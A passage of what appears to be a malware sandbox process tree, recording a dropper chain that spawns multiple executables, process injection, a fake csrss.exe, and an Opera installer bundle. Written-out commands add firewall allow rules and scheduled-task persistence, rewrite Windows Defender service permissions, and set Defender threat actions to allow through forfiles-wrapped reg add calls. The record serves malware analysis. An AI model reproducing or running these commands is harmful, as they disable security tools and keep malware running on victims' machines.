PID:1524 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:1428
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:3464
-
C:\Users\Admin\AppData\Local\Temp\1000238001\file300un.exe"C:\Users\Admin\AppData\Local\Temp\1000238001\file300un.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3772 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"3⤵PID:5856
-
C:\Users\Admin\Pictures\xf34C1uoc4EnKcwdtLQTFQEf.exe"C:\Users\Admin\Pictures\xf34C1uoc4EnKcwdtLQTFQEf.exe"4⤵
- Executes dropped EXE
PID:5460 -
C:\Users\Admin\AppData\Local\Temp\u47o.0.exe"C:\Users\Admin\AppData\Local\Temp\u47o.0.exe"5⤵
- Executes dropped EXE
PID:5740 -
C:\Users\Admin\AppData\Local\Temp\u47o.2\run.exe"C:\Users\Admin\AppData\Local\Temp\u47o.2\run.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:2348 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe6⤵PID:4204
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe7⤵PID:4280
-
C:\Users\Admin\AppData\Local\Temp\u47o.3.exe"C:\Users\Admin\AppData\Local\Temp\u47o.3.exe"5⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3636 -
C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD16⤵PID:5772
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5460 -s 14165⤵
- Program crash
PID:3460 -
C:\Users\Admin\Pictures\VAd2LBJDml5xeUucS9EAra8f.exe"C:\Users\Admin\Pictures\VAd2LBJDml5xeUucS9EAra8f.exe"4⤵
- Executes dropped EXE
PID:4796 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵PID:4928
-
C:\Users\Admin\Pictures\VAd2LBJDml5xeUucS9EAra8f.exe"C:\Users\Admin\Pictures\VAd2LBJDml5xeUucS9EAra8f.exe"5⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:2128 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Modifies data under HKEY_USERS
PID:5948 -
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"6⤵PID:1032
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes7⤵
- Modifies Windows Firewall
PID:4888 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵PID:3564
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵PID:3312
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe6⤵PID:4916
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵PID:1232
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F7⤵
- Creates scheduled task(s)
PID:3552 -
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f7⤵PID:5968
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵PID:4596
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵PID:4192
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll7⤵PID:3144
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:5420
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F7⤵
- Creates scheduled task(s)
PID:2892 -
C:\Windows\windefender.exe"C:\Windows\windefender.exe"7⤵PID:5540
-
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)8⤵PID:5288
-
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)9⤵
- Launches sc.exe
PID:1268 -
C:\Users\Admin\Pictures\opvxoSGfg9kPcG9AeGBMIMOM.exe"C:\Users\Admin\Pictures\opvxoSGfg9kPcG9AeGBMIMOM.exe"4⤵
- Executes dropped EXE
PID:5680 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵PID:2920
-
C:\Users\Admin\Pictures\opvxoSGfg9kPcG9AeGBMIMOM.exe"C:\Users\Admin\Pictures\opvxoSGfg9kPcG9AeGBMIMOM.exe"5⤵
- Executes dropped EXE
PID:5380 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Modifies data under HKEY_USERS
PID:6108 -
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"6⤵PID:4528
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes7⤵
- Modifies Windows Firewall
PID:3844 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵PID:4192
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵PID:3880
-
C:\Users\Admin\Pictures\0RVOkCttMp6duWJry0Gs9Wia.exe"C:\Users\Admin\Pictures\0RVOkCttMp6duWJry0Gs9Wia.exe" --silent --allusers=04⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
PID:5980 -
C:\Users\Admin\Pictures\0RVOkCttMp6duWJry0Gs9Wia.exeC:\Users\Admin\Pictures\0RVOkCttMp6duWJry0Gs9Wia.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.68 --initial-client-data=0x2b0,0x2b4,0x2b8,0x28c,0x2bc,0x6a49e1d0,0x6a49e1dc,0x6a49e1e85⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5072 -
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\0RVOkCttMp6duWJry0Gs9Wia.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\0RVOkCttMp6duWJry0Gs9Wia.exe" --version5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4216 -
C:\Users\Admin\Pictures\0RVOkCttMp6duWJry0Gs9Wia.exe"C:\Users\Admin\Pictures\0RVOkCttMp6duWJry0Gs9Wia.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=0 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=5980 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240428232326" --session-guid=97a9a44d-ab81-4cc1-b23c-777b10b78f3e --server-tracking-blob="ZmU5NGY4ZGNlNzAyYmIwZGI5MWYxMjFiZTg0MmFlNmFmNGZlYzQxMDM1NzczNWU3MjNjOTBlZDkwY2Q2NmFhNzp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2N19fNDU2Iiwic3lzdGVtIjp7InBsYXRmb3JtIjp7ImFyY2giOiJ4ODZfNjQiLCJvcHN5cyI6IldpbmRvd3MiLCJvcHN5cy12ZXJzaW9uIjoiMTEiLCJwYWNrYWdlIjoiRVhFIn19LCJ0aW1lc3RhbXAiOiIxNzE0MzQ2NTk3LjM3NTAiLCJ1dG0iOnsiY2FtcGFpZ24iOiI3NjdfXzQ1NiIsIm1lZGl1bSI6ImFwYiIsInNvdXJjZSI6Im1rdCJ9LCJ1dWlkIjoiYWRiM2ZkZTctODllNS00YmI3LWI3MjktMjZkM2E3MGEyNDgzIn0= " --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=70040000000000005⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
PID:5412 -
C:\Users\Admin\Pictures\0RVOkCttMp6duWJry0Gs9Wia.exeC:\Users\Admin\Pictures\0RVOkCttMp6duWJry0Gs9Wia.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.68 --initial-client-data=0x2bc,0x2c0,0x2c4,0x28c,0x2c8,0x69b1e1d0,0x69b1e1dc,0x69b1e1e86⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5144 -
C:\Users\Admin\AppData\Local\Programs\Opera\109.0.5097.68\installer.exe"C:\Users\Admin\AppData\Local\Programs\Opera\109.0.5097.68\installer.exe" --backend --initial-pid=5980 --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=0 --run-at-startup=1 --server-tracking-data=server_tracking_data --show-intro-overlay --package-dir="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404282323261" --session-guid=97a9a44d-ab81-4cc1-b23c-777b10b78f3e --server-tracking-blob="ZmU5NGY4ZGNlNzAyYmIwZGI5MWYxMjFiZTg0MmFlNmFmNGZlYzQxMDM1NzczNWU3MjNjOTBlZDkwY2Q2NmFhNzp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2N19fNDU2Iiwic3lzdGVtIjp7InBsYXRmb3JtIjp7ImFyY2giOiJ4ODZfNjQiLCJvcHN5cyI6IldpbmRvd3MiLCJvcHN5cy12ZXJzaW9uIjoiMTEiLCJwYWNrYWdlIjoiRVhFIn19LCJ0aW1lc3RhbXAiOiIxNzE0MzQ2NTk3LjM3NTAiLCJ1dG0iOnsiY2FtcGFpZ24iOiI3NjdfXzQ1NiIsIm1lZGl1bSI6ImFwYiIsInNvdXJjZSI6Im1rdCJ9LCJ1dWlkIjoiYWRiM2ZkZTctODllNS00YmI3LWI3MjktMjZkM2E3MGEyNDgzIn0= " --silent --desktopshortcut=1 --install-subfolder=109.0.5097.686⤵PID:5884
-
C:\Users\Admin\AppData\Local\Programs\Opera\109.0.5097.68\installer.exeC:\Users\Admin\AppData\Local\Programs\Opera\109.0.5097.68\installer.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win64 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.68 --initial-client-data=0x27c,0x280,0x284,0x258,0x288,0x7ff997cf7c80,0x7ff997cf7c8c,0x7ff997cf7c987⤵PID:3880
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404282323261\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404282323261\assistant\assistant_installer.exe" --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera\assistant" --copyonly=0 --allusers=07⤵PID:1528
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404282323261\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404282323261\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x234,0x238,0x23c,0x210,0x240,0xe36038,0xe36044,0xe360508⤵PID:4388
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --ran-launcher --install-extension="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404282323261\be76331b95dfc399cd776d2fc68021e0db03cc4f.crx"7⤵PID:4756
-
C:\Users\Admin\AppData\Local\Programs\Opera\109.0.5097.68\opera_crashreporter.exeC:\Users\Admin\AppData\Local\Programs\Opera\109.0.5097.68\opera_crashreporter.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win64 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.68 --initial-client-data=0x2ac,0x2b0,0x2b4,0x2a8,0x2b8,0x7ff994ade650,0x7ff994ade660,0x7ff994ade6708⤵PID:1260
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=gpu-process --no-appcompat-clear --start-stack-profiler --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:campaign-ignore-dna=on --with-feature:campaigns-2024=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:in-house-autocomplete-send=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:premium-valve-in=on --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-2:GROW-2836 --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1872,i,15293325846171049483,3193638017370649213,262144 --variations-seed-version --mojo-platform-channel-handle=1860 /prefetch:28⤵PID:5584
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --enable-quic --no-appcompat-clear --start-stack-profiler --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:campaign-ignore-dna=on --with-feature:campaigns-2024=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:in-house-autocomplete-send=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:premium-valve-in=on --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-2:GROW-2836 --field-trial-handle=2076,i,15293325846171049483,3193638017370649213,262144 --variations-seed-version --mojo-platform-channel-handle=2104 /prefetch:38⤵PID:6036
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:campaign-ignore-dna=on --with-feature:campaigns-2024=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:in-house-autocomplete-send=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:premium-valve-in=on --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-2:GROW-2836 --field-trial-handle=2316,i,15293325846171049483,3193638017370649213,262144 --variations-seed-version --mojo-platform-channel-handle=2384 /prefetch:88⤵PID:492
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --show-intro-overlay --start-maximized7⤵PID:6612
-
C:\Users\Admin\AppData\Local\Programs\Opera\109.0.5097.68\opera_crashreporter.exeC:\Users\Admin\AppData\Local\Programs\Opera\109.0.5097.68\opera_crashreporter.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win64 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.68 --initial-client-data=0x2c0,0x2c4,0x2c8,0x2bc,0x2cc,0x7ff994ade650,0x7ff994ade660,0x7ff994ade6708⤵PID:6648
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404282323261\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404282323261\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe"5⤵PID:5180
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404282323261\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404282323261\assistant\assistant_installer.exe" --version5⤵PID:6028
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404282323261\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404282323261\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x238,0x23c,0x240,0x214,0x244,0xe36038,0xe36044,0xe360506⤵PID:4496
-
C:\Users\Admin\Pictures\9s3HoD6vGqGQPo6BT2pzsOGw.exe"C:\Users\Admin\Pictures\9s3HoD6vGqGQPo6BT2pzsOGw.exe"4⤵
- Modifies firewall policy service
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2880 -
C:\Users\Admin\Pictures\D910tg0qjEG8J6uqCMB9zKF2.exe"C:\Users\Admin\Pictures\D910tg0qjEG8J6uqCMB9zKF2.exe"4⤵PID:5720
-
C:\Users\Admin\AppData\Local\Temp\7zS8090.tmp\Install.exe.\Install.exe /WkfdidVYT "385118" /S5⤵PID:4920
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"6⤵PID:1564
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"7⤵PID:2508
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 68⤵PID:2636
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 69⤵PID:5776
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"7⤵PID:4468
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 68⤵PID:1528
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 69⤵PID:3384
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"7⤵PID:5508
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 68⤵PID:3360
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 69⤵PID:6000
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"7⤵PID:2648
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 68⤵PID:5140
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 69⤵PID:2532
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"7⤵PID:1608
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force8⤵PID:3920
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force9⤵PID:5520
-
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force10⤵PID:5204
-
